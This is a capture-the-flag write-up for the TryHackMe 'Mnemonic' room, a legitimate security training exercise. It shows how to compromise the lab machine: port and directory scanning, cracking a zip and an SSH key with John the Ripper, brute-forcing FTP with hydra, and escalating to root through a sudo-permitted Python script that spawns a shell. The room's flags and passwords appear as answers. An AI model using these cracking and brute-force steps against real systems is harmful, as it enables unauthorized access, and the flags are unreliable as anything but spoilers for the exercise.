# Mnemonic

## Mnemonic

{% embed url="<https://www.youtube.com/watch?v=pBSR3DyobIY>" %}

{% hint style="success" %}
No answer needed
{% endhint %}

## Enumerate

### How many open ports?

```bash
nmap -sC -sV -T5 -p1-65535 10.10.109.236
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvCiT9XjFcbbFkJT6I%2F-MOvEWdh4nwMPl6LDFRj%2Fimage.png?alt=media\&token=58fc7aba-296b-412a-ad9c-9f7b8a60dd35)

{% hint style="success" %}
3
{% endhint %}

### What is the ssh port number?&#x20;

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvCiT9XjFcbbFkJT6I%2F-MOvEuQgsHD1jboBQ7H5%2Fimage.png?alt=media\&token=c220b282-5ab5-4d68-983b-1cae5a7c5b61)

{% hint style="success" %}
1337
{% endhint %}

### What is the name of the secret file?

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvFAeaxGKDybRkMLWs%2F-MOvGahxJDBobfodNNck%2Fimage.png?alt=media\&token=66514cdc-31e7-4df3-9b4d-a556ba4f0deb)

```bash
gobuster dir -u http://10.10.109.236 -w /usr/share/dirb/wordlists/common.txt

gobuster dir -u http://10.10.109.236 -w big.txt -x php,txt,html -t 50
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvFAeaxGKDybRkMLWs%2F-MOvHawgMEGiOe0_lLNM%2Fimage.png?alt=media\&token=77a0d48c-b8d9-4824-83fb-dd589edac8cc)

```bash
gobuster dir -u http://10.10.109.236/webmasters/ -w big.txt -x php,txt,html -t 50
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvFAeaxGKDybRkMLWs%2F-MOvHqDP8Pj4x_fGoUYe%2Fimage.png?alt=media\&token=7b297911-1f74-4741-980b-08d1fd2cd74b)

```bash
gobuster dir -u http://10.10.109.236/webmasters/admin/ -w big.txt -x php,txt,html -t 50

```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvJbO1ST_TbUtS4hxw%2F-MOvJwxz5klyoV1R8eSQ%2Fimage.png?alt=media\&token=1d1eaa62-9d21-4320-9d1d-a4e2c60b0ee7)

```bash
gobuster dir -u http://10.10.109.236/webmasters/backups -w /usr/share/dirb/wordlists/common.txt -x sql,php,txt,css,zip,csv,dat,dbf,log,mdb,sav,tar,xml,cgi
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvLTquAYIRGaMiZtbK%2F-MOvMmhLejsNx99hUjws%2Fimage.png?alt=media\&token=c474f4c5-5088-4469-8832-dfa2c6230cfa)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvKxy_oQjcDfU7wNUR%2F-MOvLFxy0NZbiYpSx2jf%2Fimage.png?alt=media\&token=ff0db964-4808-4c56-86a3-119b22b5868e)

{% hint style="success" %}
backups.zip
{% endhint %}

## Credentials

```bash
zip2john backups.zip > ziphash.txt
john ziphash.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvLTquAYIRGaMiZtbK%2F-MOvLr5CEiT_obNYwnGr%2Fimage.png?alt=media\&token=9d5eadda-fd09-49e5-8fc2-301bde53a992)

```bash
unzip backups.zip
00385007
cat backups/note.txt
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvLTquAYIRGaMiZtbK%2F-MOvM420pfqiPxGRDmDL%2Fimage.png?alt=media\&token=f194642d-7bda-4009-96bc-7ce2a885b095)

### &#x20;ftp user name?&#x20;

```bash
hydra -l ftpuser -P /usr/share/wordlists/rockyou.txt ftp://10.10.109.236 -t 50 
```

{% hint style="success" %}
ftpuser
{% endhint %}

### ftp password?&#x20;

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvLTquAYIRGaMiZtbK%2F-MOvOBoeQUVPZ9tVp4JA%2Fimage.png?alt=media\&token=8752cce5-677e-4245-9d32-a35c5b2e8d2a)

{% hint style="success" %}
love4ever
{% endhint %}

### What is the ssh username?&#x20;

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvOHh0wyTU4GjqsgX_%2F-MOvOVaNwA1SBYTyL6_a%2Fimage.png?alt=media\&token=eba9fade-cd62-4918-a567-0dfcdc767a5a)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvOXaWwDrrQXZMQInb%2F-MOvP2VOsWbRkUWedBs1%2Fimage.png?alt=media\&token=24a43b90-afb6-4f6b-8133-c1288f3b5249)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvOXaWwDrrQXZMQInb%2F-MOvPLkSrvULfEO7ejhe%2Fimage.png?alt=media\&token=d9deda9d-dc4f-4535-a243-32f7658c89aa)

{% hint style="success" %}
james
{% endhint %}

### What is the ssh password?

```bash
chmod 600 id_rsa
ssh -i id_rsa james@10.10.109.236
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvPPrFkBVi_Hq95w3w%2F-MOvQHlEsKYhpTFu0Df1%2Fimage.png?alt=media\&token=cf2e933b-aeea-4822-952a-76817f9971c9)

```bash
python3 /usr/share/john/ssh2john.py id_rsa > john_ssh.txt
john --wordlist=/usr/share/wordlists/rockyou.txt john_ssh.txt

```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvPPrFkBVi_Hq95w3w%2F-MOvR495PLNOovJRebc4%2Fimage.png?alt=media\&token=b5bc611b-7f5a-4364-9793-bdaf8929f8d6)

{% hint style="success" %}
bluelove
{% endhint %}

### What is the condor password?&#x20;

```bash
ssh james@10.10.109.239 -p 1337
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvPPrFkBVi_Hq95w3w%2F-MOvTvp1ea3-vhbHVisV%2Fimage.png?alt=media\&token=0a979513-efcb-4ee4-b339-858ee88a2a5a)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvPPrFkBVi_Hq95w3w%2F-MOvSe2S_fBFEYKXAR1J%2Fimage.png?alt=media\&token=33cb8ce7-7142-4153-8833-07cfedf5f29d)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvPPrFkBVi_Hq95w3w%2F-MOvSnIcHcAYVf3IwVml%2Fimage.png?alt=media\&token=d0537b10-984c-4691-9c0e-1418cfe8f175)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvTy-z7hEe8UZT16Lx%2F-MOvUAbw1W5aUY__dWCr%2Fimage.png?alt=media\&token=e073e466-773d-46ff-a1bf-f37dd932feac)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvTy-z7hEe8UZT16Lx%2F-MOvUW2s0jxWosC0jjUt%2Fimage.png?alt=media\&token=4ff9462e-4d8d-46d2-93bf-21e39bfa14f4)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvUY6ByM7nSg7ZkXSa%2F-MOvV5-SGoMED7rn-OtJ%2Fimage.png?alt=media\&token=d6cbf8f9-9116-4ee6-ac68-98bcb440e11b)

```bash
git clone https://github.com/MustafaTanguner/Mnemonic
cd Mnemonic/
python3 -m pip install --user colored
python3 -m pip install --user opencv-python
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvVji5svCKrvhHVJTT%2F-MOvfnJjPPghwUIkX9hC%2Fimage.png?alt=media\&token=3d07f94c-4e3f-4691-ae30-576b72df5219)

```bash
python3 Mnemonic.py
/root/mnemonic/maxresdefault.jpg
2
/root/mnemonic/6450.txt
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvVji5svCKrvhHVJTT%2F-MOvhZvY9QtPl6lLgw-F%2Fimage.png?alt=media\&token=4cd1f552-3238-4816-b0fb-f3af271ba846)

{% hint style="success" %}
pasificbell1981
{% endhint %}

## Hack the machine

### user.txt&#x20;

{% hint style="success" %}
THM{a5f82a00e2feee3465249b855be71c01}
{% endhint %}

### root.txt

```bash
ssh -p 1337 condor@10.10.109.239
sudo -l
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvhsJDEgxTk9_Jq2UD%2F-MOvioPCPB2ybDfBoOl3%2Fimage.png?alt=media\&token=404f9736-30ec-48e6-96b0-bfb6ab682331)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvhsJDEgxTk9_Jq2UD%2F-MOvj-RmbhGmw97jAmwn%2Fimage.png?alt=media\&token=b1e9cb5e-135a-4099-972b-a2bc28a4a701)

```bash
sudo /usr/bin/python3 /bin/examplecode.py
0
.
/bin/bash
```

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvhsJDEgxTk9_Jq2UD%2F-MOvmGD4zIvb3nkbhxFV%2Fimage.png?alt=media\&token=2f39bb96-f438-4d1f-97e7-953374ec687a)

![](https://244894268-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MO2llY9Epz_XDFDa7VZ%2F-MOvhsJDEgxTk9_Jq2UD%2F-MOvmjYvNJ_eAhNeoTW5%2Fimage.png?alt=media\&token=1fea0a9e-f5d7-4dac-a339-5c9e79ae23d4)

{% hint style="success" %}
THM{2a4825f50b0c16636984b448669b0586}
{% endhint %}